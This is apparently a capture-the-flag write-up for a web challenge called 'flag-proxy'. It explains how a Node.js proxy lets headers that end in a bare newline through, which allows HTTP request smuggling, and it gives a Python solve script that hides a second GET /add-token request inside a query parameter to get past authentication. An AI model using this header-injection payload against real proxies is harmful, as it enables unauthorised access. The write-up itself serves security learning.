Tags: web
Rating:
I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless...
The proxy's HTTP client can be exploited to make more than one request to the downstream server.
These are not valid HTTP requests, because some headers use only \n
as line terminator, but the downstream server will accept them (it's not appening anymore since Node.JS 18.5.0).
import requests
import random
import string
URL = os.environ.get("URL", "http://flag-proxy.challs.teamitaly.eu")
token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(20))
payload = 'AAAA\n'
payload += 'Content-Length: 0\n'
payload += 'Connection: keep-alive\n'
payload += '\n'
payload += f'GET /add-token?token={token} HTTP/1.0\n'
payload += 'Host: localhost'
response = requests.get(f"{URL}/flag", params={'token': payload})
print(response.text)
response = requests.get(f"{URL}/flag", params={'token': token})
print(response.text)